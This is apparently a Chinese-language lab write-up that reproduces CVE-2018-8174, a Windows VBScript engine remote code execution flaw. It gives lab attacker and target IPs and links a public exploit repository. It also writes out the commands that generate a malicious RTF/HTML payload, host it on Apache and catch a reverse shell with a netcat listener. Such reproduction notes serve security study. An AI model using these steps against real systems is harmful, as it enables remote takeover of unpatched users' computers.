漏洞描述:
CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。
微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174
由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。
漏洞复现:
攻击机 IP:192.168.1.101
靶机 IP:192.168.1.111
github:https://github.com/Yt1g3r/CVE-2018-8174_EXP
0x01 生成payload
python CVE-2018-8174.py -u http://192.168.1.101/ -o exp.rtf -i 192.168.1.101 -p 4444
-u
:url地址-o
: 输出文件-i
:监听地址-p
:监听端口
0x02 测试
把 explot.html 复制到 /var/www/html/,并开启 apache 服务
sudo cp exploit.html /var/www/html/
开启Apache服务sudo service apache2 start
攻击机监听端口nc -lvvp 4444
靶机使用IE打开URLhttp://192.168.1.101/exploit.html
靶机打开生成的Word文档也是一样的,可是我没测试成功